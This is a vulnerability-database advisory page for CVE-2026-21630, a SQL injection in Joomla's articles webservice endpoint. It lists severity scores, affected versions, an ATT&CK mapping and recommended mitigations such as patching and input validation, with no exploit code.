Cyber Resilience

CVE-2026-21630

Medium

Published: 01 April 2026

Published
01 April 2026
Modified
09 April 2026
KEV Added
Patch
CVSS Score v4 6.9 CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS Score 0.0034 25.9th percentile
Risk Priority 35 floored blend · peak EPSS

Summary

CVE-2026-21630 is a medium-severity SQL Injection (CWE-89) vulnerability in Joomla Joomla\!. Its CVSS base score is 6.9 (Medium).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 25.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-21630 is a SQL injection vulnerability stemming from improperly built order clauses in the articles webservice endpoint of Joomla's com_content component. This affects Joomla CMS core, with a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), classified under CWE-89. The issue was published on 2026-04-01.

The vulnerability can be exploited remotely by low-privileged authenticated users with low attack complexity and no user interaction required. Successful exploitation enables high-impact compromise of confidentiality, integrity, and availability, potentially allowing arbitrary SQL query execution to read, modify, or delete database contents.

Joomla's security advisory (https://developer.joomla.org/security-centre/1028-20260302-core-sql-injection-in-com-content-articles-webservice-endpoint.html) addresses the vulnerability, providing details on the affected endpoint and recommending updates to patched versions for mitigation.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

Improperly built order clauses lead to a SQL injection vulnerability in the articles webservice endpoint.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

Direct SQL injection in Joomla public-facing webservice endpoint enables remote exploitation of web application.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-35222Same product: Joomla Joomla\!
CVE-2026-35221Same product: Joomla Joomla\!
CVE-2026-21629Same product: Joomla Joomla\!
CVE-2026-23899Same product: Joomla Joomla\!
CVE-2024-40749Same product: Joomla Joomla\!
CVE-2024-40748Same product: Joomla Joomla\!
CVE-2026-40383Same product: Joomla Joomla\!
CVE-2026-48899Same product: Joomla Joomla\!
CVE-2026-23898Same product: Joomla Joomla\!
CVE-2026-48904Same product: Joomla Joomla\!

Affected Assets

joomla
joomla\!
3.0.0 — 5.4.4 · 6.0.0 — 6.0.4

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly mitigates CVE-2026-21630 by identifying, scanning for, and applying the vendor patch that corrects the improper SQL order clause construction in Joomla's articles webservice.

prevent

Prevents SQL injection exploitation by implementing input validation mechanisms at the articles webservice endpoint to sanitize or reject malicious order clauses.

prevent

Mitigates the vulnerability by restricting order clause inputs to whitelisted safe values, such as predefined column names, blocking injection payloads.

References